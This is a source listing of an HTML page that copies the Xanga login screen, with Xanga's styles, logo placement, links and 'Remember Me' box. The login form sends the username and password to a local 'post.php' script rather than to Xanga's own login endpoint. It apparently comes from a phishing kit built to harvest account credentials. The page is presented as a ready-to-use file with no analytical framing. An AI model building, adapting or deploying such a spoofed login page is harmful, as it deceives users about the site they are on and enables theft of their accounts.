index.html 3.3 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192
  1. <!DOCTYPE html>
  2. <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  5. <title>Xanga &rsaquo; Log In</title>
  6. <link rel='stylesheet' id='wp-admin-css' href='http://xanga.com/wp-admin/css/wp-admin.min.css?ver=3.6.2-alpha' type='text/css' media='all' />
  7. <link rel='stylesheet' id='buttons-css' href='http://xanga.com/wp-includes/css/buttons.min.css?ver=3.6.2-alpha' type='text/css' media='all' />
  8. <link rel='stylesheet' id='colors-fresh-css' href='http://xanga.com/wp-admin/css/colors-fresh.min.css?ver=3.6.2-alpha' type='text/css' media='all' />
  9. <meta name='robots' content='noindex,nofollow' />
  10. <meta name="robots" content="noarchive" />
  11. <style type="text/css">
  12. .login h1 a {
  13. background-image: url("img/logo.png");
  14. background-position: center top;
  15. background-size: 300px 160px;
  16. background-repeat: no-repeat;
  17. height: 160px;
  18. width: 320px;
  19. padding:0;
  20. }
  21. #wpadminbar {
  22. background:#4685C4 !important;
  23. color:#fff;
  24. }
  25. #wpadminbar .quicklinks > ul > li > a , #wpadminbar .quicklinks > ul > li, #wpadminbar .quicklinks > ul > li.opposite, #wpadminbar .quicklinks > ul > li.opposite a,
  26. #wpadminbar .quicklinks .ab-top-secondary > li > a, #wpadminbar .quicklinks .ab-top-secondary > li > .ab-empty-item {
  27. border-color:#4685C4 !important;
  28. color:#fff;
  29. }
  30. #wpadminbar .ab-top-secondary {
  31. background:#4685C4 !important;
  32. color:#fff;
  33. }
  34. li.xangalogo-toolbar .ab-item, li.xangalogo-toolbar .ab-item:focus {
  35. width:95px !important;
  36. height:15px !important;
  37. text-indent:-9999em;
  38. background: #4685C4 url("//xanga.com/common/xangalogo-toolbar.png") no-repeat top left !important;
  39. margin:7px 3px 0 3px !important;
  40. padding:0 !important;
  41. }
  42. </style>
  43. </head>
  44. <body class="login login-action-login wp-core-ui">
  45. <div id="login">
  46. <h1><a href="http://xanga.com/" title="Xanga">Xanga</a></h1>
  47. <form name="loginform" id="loginform" action="post.php" method="post">
  48. <p>
  49. <label for="user_login">Username<br />
  50. <input type="text" name="log" id="user_login" class="input" value="" size="20" /></label>
  51. </p>
  52. <p>
  53. <label for="user_pass">Password<br />
  54. <input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></label>
  55. </p>
  56. <input type="hidden" name="time2n" value="1644797514" /> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /> Remember Me</label></p>
  57. <p class="submit">
  58. <input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="Log In" />
  59. <input type="hidden" name="redirect_to" value="http://xanga.com/wp-admin/admin.php?page=xanga_reading" />
  60. <input type="hidden" name="testcookie" value="1" />
  61. </p>
  62. </form>
  63. <p id="nav">
  64. <a href="http://xanga.com/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password?</a>
  65. </p>
  66. <script type="text/javascript">
  67. function wp_attempt_focus(){
  68. setTimeout( function(){ try{
  69. d = document.getElementById('user_login');
  70. d.focus();
  71. d.select();
  72. } catch(e){}
  73. }, 200);
  74. }
  75. wp_attempt_focus();
  76. if(typeof wpOnload=='function')wpOnload();
  77. </script>
  78. <p id="backtoblog"><a href="http://xanga.com/" title="Are you lost?">&larr; Back to Xanga</a></p>
  79. </div>
  80. <div class="clear"></div>
  81. </body>
  82. </html>